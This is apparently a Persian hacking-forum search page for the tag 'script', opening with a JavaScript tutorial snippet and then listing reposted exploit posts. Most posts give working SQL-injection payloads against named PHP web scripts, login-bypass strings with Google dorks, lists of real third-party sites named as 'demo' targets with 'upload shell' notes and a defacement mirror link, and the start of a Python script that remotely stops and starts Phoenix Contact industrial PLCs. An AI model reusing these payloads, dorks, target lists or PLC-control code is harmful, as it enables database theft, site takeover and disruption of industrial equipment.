رفتن به مطلب



iran rules jazbe modir
ADS mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'script'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


انجمن آموزش امنیت و راه های مقابله با نفوذ

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
  • بخش ویژه (مخصوص اعضای ویژه)
  • پروژه های تیم
  • مسابقات
  • عمومی
  • بحث آزاد علمی
  • بخش دریافت
  • آرشیو

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

41 نتیجه پیدا شد

  1. Doctor Robot

    Programming-JS آموزش 0 تا 100 java script

    JavaScript چیست جاوااسکریپت (JavaScript) یک از زبان‌ برنامه نویسی شیء گرا و پرطرفدار وب می‌باشد. این زبان را در ابتدا شخصی به نام Brendan Eich (برندان ایچ) در شرکت Netscape با نام Mocha طراحی نمود. این نام بعداً به LiveScript و نهایتاً به جاوااسکریپت تغییر یافت. این تغییر نام تقریباً با افزوده شدن پشتیبانی از جاوا در مرورگر وب Netscape Navigator همزمانی دارد. اولین نسخهٔ جاوااسکریپت در نسخه 2.0B3 این مرورگر در دسامبر 1995 معرفی و عرضه شد. این نام گذاری منجر به سردرگمی‌های زیادی شده و این ابهام را ایجاد می‌کند که جاوااسکریپت با جاوا مرتبط است در حالی که این‌طور نیست. عدهٔ زیادی این کار را یک ترفند تجاری برای به دست آوردن بخشی از بازار جاوا که در آن موقع زبان جدید مطرح برای برنامه‌نویسی تحت وب بود می‌دانند. JavaScript به صورت «جاواسکریپت» خوانده می‌شود، ولی در فارسی به صورت «جاوااسکریپت» ترجمه می‌شود و اگر به صورت «جاوا اسکریپت» ترجمه شود اشتباه است چون دو کلمه جدا از هم نیست و اگر به صورت دو کلمه جدا نوشته شود خطاهای نگارشی ایجاد می‌شود، به‌طور مثال ممکن است کلمه جاوا در انتهای خط و کلمه اسکریپت در ابتدای خط بعدی نوشته شود. علیرغم اشتباه عمومی، زبان جاوااسکریپت با زبان جاوا ارتباطی ندارد، اگر چه ساختار این زبان به سی پلاس پلاس (++C) و جاوا شباهت دارد که این امر برای یادگیری آسان در نظر گرفته شده‌ است.
  2. اسکریپت پیدا کردن پنل ادمین وبسایت نوشته شده توسط : @Moeein Seven جهت تهیه سورس این اسکریپت با اکانت تلگرام زیر در ارتباط باشید @xx_game_over_xx جهت استفاده از این اسکریپت وارد لینک زیر شوید www.apf.moeein.ir
  3. [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] title : admin panel bypass with shell script uploader under 60sec [+] author : AnonySec [+] dork : inurl:"/admin/login.php" '=''or' [+] my team : www.anonysec.org [+] risk : high [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] search the google dork ==> inurl:"/admin/login.php" '=''or' [+] select a target [+] go to this directory in the web ==> /admin/login.php [+] bypass user&pass with this script ==> '=''or' [+] demo: www.kleshko.info/FAQ/admin/login.php www.crown3d.net/admin/login.php www.davalleygrill.com/admin/login.php?order=yes https://arisechurch.org/admin/login.php menoavilys.org/admin/login.php michenerinvestments.com/admin/login.php [+] discovered by ==> Moeein Seven | www.moeein.ir [+] tnx==> ReZa CloNer , RedNofozi , inj3ct3r , Sheikh Shahin and all bax from anonysec team.... http://www.exploit4arab.org/exploits/2178
  4. # Exploit Title: Powered By CF Image Hosting script admin page bypass vulnerability / upload shell # Exploit Author: Rednofozi # Date:2018-10-11 # Email: Rednofozi@yahoo.com # Vendor Homepage: www.codefuture.co.uk # OUR SITE : https://anonysec.org # MY page Exploit: https://www.exploit-db.com/author/?a=2243 |==================================================================================== # {INFO} # admin bypass Vulnerability |==================================================================================== # {DORK} # intext:"Powered By CF Image Hosting script |==================================================================================== # {POC} # admin page: # site.com/admin # exploit: # Username: '=''or' # password: '=''or' # # zone-h test hacked http://www.zone-h.org/mirror/id/31702111 |==================================================================================== # {DEMO} # 01: http://www.irtci.ir/pic/admin.php # 02: hhttp://image4web.net/admin/ # 03: https://admin.serconi.es/admin # 04: and upload shell # 05: # 06: # 07: # 08: # 09: # 10: |==================================================================================== # {TNX For} # >>> Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow # >>> Discovered By :Rednofozi http://www.exploit4arab.org/exploits/2114
  5. ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. by Rednofozi anonysec hackers iran .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' ==================================================================================== # Exploit Title: Image Hosting script admin page bypass vulnerability / upload shell # Exploit Author: Rednofozi # Date:26-09-2018 # Email: Rednofozi@yahoo.com # Vendor Homepage: www.codefuture.co.uk # OUR SITE : https://anonysec.org |==================================================================================== # {INFO} # admin bypass Vulnerability |==================================================================================== # {DORK} # intext:"Powered By CF Image Hosting script |==================================================================================== # {POC} # admin page: # site.com/admin # exploit: # Username: '=''or' # password: '=''or' # # zone-h test hacked http://www.zone-h.org/mirror/id/31702111 |==================================================================================== # {DEMO} # 01: http://www.irtci.ir/pic/admin.php # 02: hhttp://image4web.net/admin/ # 03: https://admin.serconi.es/admin # 04: and upload shell # 05: # 06: # 07: # 08: # 09: # 10: |==================================================================================== # {TNX For} # >>> Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow # >>> Discovered By :Rednofozi |==================================================================================== The END ; Good Luck :D:D:D http://www.exploit4arab.org/exploits/2051
  6. # # # # # # Exploit Title: iTech Caregiver Script 2.71 - SQL Injection # Dork: N/A # Date: 18.08.2017 # Vendor Homepage : http://itechscripts.com/ # Software Link: http://itechscripts.com/caregiver-script/ # Demo: http://caregiver.itechscripts.com/ # Version: 2.71 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/searchSitter.php?myCity=[SQL] # -1'+/*!22222union*/+/*!22222select*/+(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32))--+- # # http://localhost/[PATH]/searchSitter.php?sitterService=[SQL] # # http://localhost/[PATH]/searchSitter.php?age=[SQL] # # http://localhost/[PATH]/searchSitter.php?gender=[SQL] # # http://localhost/[PATH]/searchSitter.php?lastLoginElapsedInDays=[SQL] # # http://localhost/[PATH]/searchSitter.php?yearsOfExperience=[SQL] # # http://localhost/[PATH]/searchSitter.php?collegeLevel=[SQL] # # http://localhost/[PATH]/searchSitter.php?fullPartTime=[SQL] # # http://localhost/[PATH]/searchSitter.php?liveInOut=[SQL] # # http://localhost/[PATH]/searchJob.php?sitterService=[SQL] # # http://localhost/[PATH]/searchJob.php?jobType=[SQL] # # http://localhost/[PATH]/searchJob.php?jobFrequency=[SQL] # # Etc... # # # # # http://caregiver.itechscripts.com/searchSitter.php?myCity=-1'+/*!22222union*/+/*!22222select*/+(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32))--+- http://caregiver.itechscripts.com/searchSitter.php?sitterService=1' http://caregiver.itechscripts.com/searchSitter.php?myCity=1' http://caregiver.itechscripts.com/searchSitter.php?age=1' http://caregiver.itechscripts.com/searchSitter.php?gender=1' http://caregiver.itechscripts.com/searchSitter.php?lastLoginElapsedInDays=1' http://caregiver.itechscripts.com/searchSitter.php?yearsOfExperience=1' http://caregiver.itechscripts.com/searchSitter.php?collegeLevel=1' http://caregiver.itechscripts.com/searchSitter.php?fullPartTime=1' http://caregiver.itechscripts.com/searchSitter.php?liveInOut=1' http://caregiver.itechscripts.com/searchJob.php?sitterService=2' http://caregiver.itechscripts.com/searchJob.php?jobType=2' http://caregiver.itechscripts.com/searchJob.php?jobFrequency=2'
  7. # # # # # # Exploit Title: iTech Classifieds Script 7.41 - SQL Injection # Dork: N/A # Date: 18.08.2017 # Vendor Homepage : http://itechscripts.com/ # Software Link: http://itechscripts.com/classifieds-script/ # Demo: http://classifieds.itechscripts.com/ # Version: 7.41 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/message.php?pid=[SQL] # -13++UNION+ALL+SELECT+0x31,0x32,0x33,0x34,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235,0x3236,0x3237,0x3238,0x3239,0x3330,0x3331,0x3332,0x3333,0x3334,0x3335,0x3336,0x3337,0x3338,0x3339,0x3430,0x3431,0x3432,0x3433,0x3434,0x3435,0x3436,0x3437,0x3438,0x3439,0x3530,0x3531,0x3532--+- # # http://localhost/[PATH]/userlistings.php?id=[SQL] # # http://localhost/[PATH]/show_like.php?cid=[SQL] # # Etc... # # # # #
  8. # # # # # # Exploit Title: iTech Image Sharing Script 4.13 - SQL Injection # Dork: N/A # Date: 18.08.2017 # Vendor Homepage : http://itechscripts.com/ # Software Link: http://itechscripts.com/image-sharing-script/ # Demo: http://photo-sharing.itechscripts.com/ # Version: 4.13 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/pinDetails.php?token=[SQL] # -7136c4ca4238a0b923820dcc509a6f75849b'+UNION(SELECT+0x283129,0x283229,0x283329,0x283429,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x2832302)--+- # # http://localhost/[PATH]/boardpage.php?token=[SQL] # # http://localhost/[PATH]/searchpin.php?q=[SQL] # # http://localhost/[PATH]/profilepage.php?token=[SQL] # # Etc... # # # # #
  9. # # # # # # Exploit Title: iTech Freelancer Script 5.27 - SQL Injection # Dork: N/A # Date: 18.08.2017 # Vendor Homepage : http://itechscripts.com/ # Software Link: http://itechscripts.com/freelancer-script/ # Demo: http://freelance.itechscripts.com/ # Version: 5.27 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/profile.php?u=[SQL] # -c4ca4238a0b923820dcc509a6f75849b'+UNION(SELECT+0x283129,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529)--+- # # http://localhost/[PATH]/showSkill.php?cat=[SQL] # -1+UNION(SELECT+0x283129,0x283229,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283429)--+- # # Etc... # # # # #
  10. # # # # # # Exploit Title: iTech Travel Script 9.49 - SQL Injection # Dork: N/A # Date: 18.08.2017 # Vendor Homepage : http://itechscripts.com/ # Software Link: http://itechscripts.com/travel-portal-script/ # Demo: http://travelportal.itechscripts.com/ # Version: 9.49 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/hotel_view.php?id=[SQL] # -9+UNION(SELECT+0x283129,0x283229,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029)--+- # # http://localhost/[PATH]/bus_details.php?id=[SQL] # # Etc... # # # # #
  11. # # # # # # Exploit Title: iTech Multi Vendor Script 6.63 - SQL Injection # Dork: N/A # Date: 18.08.2017 # Vendor Homepage : http://itechscripts.com/ # Software Link: http://itechscripts.com/multi-vendor-shopping-script/ # Demo: http://multi-vendor.itechscripts.com/ # Version: 6.63 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/search.php?category_id=[SQL] # -9+UNION(SELECT+0x283129,0x283229,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529)--+- # # http://localhost/[PATH]/product.php?id=[SQL] # # Etc... # # # # #
  12. # # # # # # Exploit Title: iTech Dating Script 3.40 - SQL Injection # Dork: N/A # Date: 18.08.2017 # Vendor Homepage : http://itechscripts.com/ # Software Link: http://itechscripts.com/dating-script/ # Demo: http://dating.itechscripts.com/ # Version: 3.40 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/see_more_details.php?id=[SQL] # -48+UNION(SELECT+0x283129,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929)--+- # # http://localhost/[PATH]/send_gift.php?id=[SQL] # # Etc... # # # # #
  13. # # # # # # Exploit Title: iTech Job Script 9.27 - SQL Injection # Dork: N/A # Date: 18.08.2017 # Vendor Homepage : http://itechscripts.com/ # Software Link: http://itechscripts.com/job-portal-script/ # Demo: http://job-portal.itechscripts.com/ # Version: 9.27 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/Employer_Details.php?id=[SQL] # -3'++UNION+ALL+SELECT+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235,0x3236,0x3237,0x3238,0x3239,0x3330,0x3331,0x3332--+- # # http://localhost/[PATH]/Job_Details.php?id=[SQL] # # Etc... # # # # #
  14. # # # # # # Exploit Title: iTech Movie Script 7.51 - SQL Injection # Dork: N/A # Date: 18.08.2017 # Vendor Homepage : http://itechscripts.com/ # Software Link: http://itechscripts.com/movie-portal-script/ # Demo: http://movie-portal.itechscripts.com/ # Version: 7.51 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/movie.php?f=[SQL] # -9+UNION(SELECT+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x2833429)--+- # # http://localhost/[PATH]/show_misc_video.php?id=[SQL] # # http://localhost/[PATH]/tvshow.php?s=[SQL] # # Etc... # # # # #
  15. # # # # # # Exploit Title: PHP Coupon Script 6.0 - 'cid' Parameter SQL Injection # Dork: N/A # Date: 21.08.2017 # Vendor Homepage: http://www.couponscript.com/ # Software Link: http://www.couponscript.com/ # Demo: http://www.couponscript.com/demo/ # Version: 6.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php?page=cat&cid=[SQL] # # 34'+/*!00000Procedure*/+/*!00000Analyse*/+(extractvalue(0,/*!00000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)--+- # # Etc... # # # # #
  16. # # # # # # Exploit Title: Affiliate Niche Script 3.4.0 SQL Injection # Dork: N/A # Date: 21.08.2017 # Vendor Homepage: https://scriptoffice.com/ # Software Link: https://soft.scriptoffice.com/projects/affiliatenichescript/wiki/Main_Menu # Demo: http://demodesigns.affiliatenichescript.com/ # Version: 3.4.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/default_blue/Appliances/Categories/[SQL]/ # # 1'+uNiOn+sElEct+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x3c48313e494853414e2053454e43414e3c2f48313e,0x283929,0x28313029,0x28313129,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229+--+-/ # # Etc... # # # # #
  17. # # # # # # Exploit Title: PHP Classifieds Script 5.6.2 SQL Injection # Dork: N/A # Date: 21.08.2017 # Vendor Homepage: https://scriptoffice.com/ # Software Link: https://soft.scriptoffice.com/projects/classifiedscript/wiki/Main_Menu # Demo: http://www.classifieddemo.com/ # Version: 5.6.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/[SQL]/ # # http://localhost/[PATH]/category/[SQL]/ # # Etc... # # # # #
  18. # # # # # # Exploit Title: iTech Social Networking Script 3.08 - SQL Injection # Dork: N/A # Date: 21.08.2017 # Vendor Homepage: http://itechscripts.com/ # Software Link: http://itechscripts.com/social-networking-script/ # Demo: http://social.itechscripts.com # Version: 3.08 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows the users to inject sql commands ... # # Proof of Concept: # # http://localhost/[PATH]/timeline.php?token=[SQL] # # -5458c74d97b01eae257e44aa9d5bade97baf'++uNiOn+sElEct+(/*!00000SeLect*/(@x)/*!00000fRom*/(/*!00000select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!00000select*/(0)/*!00000from*/(information_schema.columns)/*!00000where*/(table_schema=database())and(0x00)in(@x:=/*!00000CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!00000CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629+--+- # # http://localhost/[PATH]/photos_of_you.php?token=[SQL] # # Etc... # # # # #
  19. # # # # # # Exploit Title: Bitcoin,Dogecoin Mining 1.0 - Authentication Bypass # Dork: N/A # Date: 21.08.2017 # Vendor Homepage: https://codecanyon.net/user/bousague # Software Link: https://codecanyon.net/item/bitcoindogecoin-mining-php-script/20315581 # Demo: http://test.z-files.site/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to access the user panel and administration panel ... # # Proof of Concept: # # http://localhost/[PATH]/ # http://localhost/[PATH]/admincqqq # User: anything Pass: 'or 1=1 or ''=' # # Etc... # # # # #
  20. #! /usr/bin/env python ''' # Exploit Title: Phoenix Contact ILC 150 ETH PLC Remote Control script # Date: 2015-05-19 # Exploit Author: Photubias - tijl[dot]deneut[at]howest[dot]be # Vendor Homepage: https://www.phoenixcontact.com/online/portal/us?urile=pxc-oc-itemdetail:pid=2985330 # Version: ALL FW VERSIONS # Tested on: Python runs on Windows, Linux # CVE : CVE-2014-9195 Copyright 2015 Photubias(c) Written for Howest(c) University College This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. File name ControlPLC.py written by tijl[dot]deneut[at]howest[dot]be This POC will print out the current status of the PLC, continuously every 0.1 second, after 3 seconds it reverts (start becomes stop, stop becomes cold start), and stops after 5 seconds Works on ILC 15x ETH, partly on RFC 43x, partly on ILC 39x ''' import sys, socket, binascii, time, os, select, re IP='' infoport=1962 controlport=41100 ## Defining Functions First def send_and_recv(s,size,strdata): data = binascii.unhexlify(strdata) ## Convert to real HEX (\x00\x00 ...) s.send(data) ret = s.recv(4096) return ret def doAction(s,strdata): ret = send_and_recv(s,1000,strdata) # In official state these are send, they do not seem to be needed send_and_recv(s,1000,packet1) send_and_recv(s,1000,packet2) send_and_recv(s,1000,packet2) ret = send_and_recv(s,1000,'010002000000020003000100000000000840') send_and_recv(s,1000,packet2) return ret def initMonitor(s): send_and_recv(s,1000,'0100000000002f00000000000000cfff4164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c536572766963653200') send_and_recv(s,1000,'0100000000002e0000000000000000004164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c5365727669636500') send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446174614163636573735365727669636500') send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e49446576696365496e666f536572766963653200') send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446576696365496e666f5365727669636500') send_and_recv(s,1000,'0100000000002500000000000000d9ff4164652e52656d6f74696e672e53657276696365732e49466f726365536572766963653200') send_and_recv(s,1000,'010000000000240000000000000000004164652e52656d6f74696e672e53657276696365732e49466f7263655365727669636500') send_and_recv(s,1000,'0100000000003000000000000000ceff4164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653300') send_and_recv(s,1000,'010000000000300000000000000000004164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653200') send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e49446576696365496e666f536572766963653200') send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446576696365496e666f5365727669636500') send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e4944617461416363657373536572766963653300') send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446174614163636573735365727669636500') send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e4944617461416363657373536572766963653200') send_and_recv(s,1000,'0100000000002900000000000000d5ff4164652e52656d6f74696e672e53657276696365732e49427265616b706f696e745365727669636500') send_and_recv(s,1000,'0100000000002800000000000000d6ff4164652e52656d6f74696e672e53657276696365732e4943616c6c737461636b5365727669636500') send_and_recv(s,1000,'010000000000250000000000000000004164652e52656d6f74696e672e53657276696365732e494465627567536572766963653200') send_and_recv(s,1000,'0100000000002f00000000000000cfff4164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c536572766963653200') send_and_recv(s,1000,'0100000000002e0000000000000000004164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c5365727669636500') send_and_recv(s,1000,'0100000000003000000000000000ceff4164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653300') 